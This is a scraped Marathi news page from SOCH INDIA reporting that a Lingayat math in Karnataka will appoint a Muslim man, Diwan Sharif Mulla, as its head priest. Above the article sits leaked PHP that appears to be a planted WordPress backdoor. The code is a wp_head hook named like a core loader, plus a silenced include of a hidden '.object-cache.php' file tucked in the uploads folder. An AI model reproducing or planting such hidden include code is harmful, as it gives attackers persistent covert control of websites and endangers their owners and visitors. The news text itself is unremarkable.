add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मुस्लिम युवक होणार लिंगायत मठाचा मुख्य पूजारी – SOCH INDIA
Menu

देश
मुस्लिम युवक होणार लिंगायत मठाचा मुख्य पूजारी

nobanner

उत्तर कर्नाटकातील गडंग जिल्ह्यात लिंगायत मठाने परंपरेला छेद देत एका मु्स्लिम युवकाला आपला मुख्य पूजारी म्हणून नियुक्त करण्याचा निर्णय घेतला आहे. दीवान शरीफ रहमानसाब मुल्ला (३३) असे या युवकाचे नाव आहे. दीवान शरीफ रहमानसाब मुल्ला यांना येत्या २६ फेब्रुवारीला रीतसर विधी करुन लिंगायत मठाच्या पुजारीपदी नियुक्त करण्यात येईल.

१२ व्या शतकातील सुधारक बसवन्ना यांच्या शिकवणीचा बालपणापासून माझ्यावर प्रभाव आहे. सामाजिक न्याय आणि सदभावनेचे त्यांचे जे विचार आहेत त्यानुसारच आपण काम करु असे दीवान शरीफ यांनी सांगितले. आसुती गावातील मुरुगराजेंद्र कोरानेश्वरा शांतीधाम मठामध्ये शरीफला पुजारी बनवण्यात येणार आहे.

हा मठ कलबुर्गीमधल्या खजुरी गावातील ३५० वर्षापूर्वीच्या कोरानेश्वर संस्थेच्या मठाशी जोडलेला आहे. आसुती गावात शिवयोगीच्या प्रवचनांनी प्रभावित होऊन, शरीफ यांचे पिता स्वर्गीय रहिमनसब मुल्ला यांनी गावात एक मठ स्थापन करण्यासाठी दोन एकर जागा दिली होती.